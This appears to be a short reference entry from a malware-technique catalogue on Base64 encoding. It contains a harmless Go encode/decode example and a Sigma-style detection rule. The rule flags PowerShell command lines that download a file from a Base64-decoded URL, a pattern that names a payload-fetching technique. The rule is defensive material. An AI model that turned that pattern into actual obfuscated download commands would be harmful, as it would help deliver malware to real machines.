Base64

Base64 is used to represent binary data in an ASCII string. This is a simple encoding and commonly found into malware.

U0706

Code Snippets

package main

import (
    "encoding/base64"
    "fmt"
    "os"
)

func main() {

    arg1 := os.Args[1]

    encoded := base64.StdEncoding.EncodeToString([]byte(arg1))
    fmt.Println(encoded)

    decoded, err := base64.StdEncoding.DecodeString(encoded)
    if err != nil {
        panic("error")
    }
    fmt.Println(string(decoded))
}

Detection Rules

title: Powershell download file from base64 url
status: experimental
description: Powershell download file from base64 url
author: Joe Security
date: 2020-04-13
id: 200072
threatname:
behaviorgroup: 1
classification: 8
mitreattack:

logsource:
      category: process_creation
      product: windows
detection:
      selection:
          CommandLine:
              - '*.downloadfile([system.text.encoding]::ascii.getstring([system.convert]::frombase64string(*'
      condition: selection
level: critical

Additional Resources

Subscribe to our Newsletter and don't miss important updates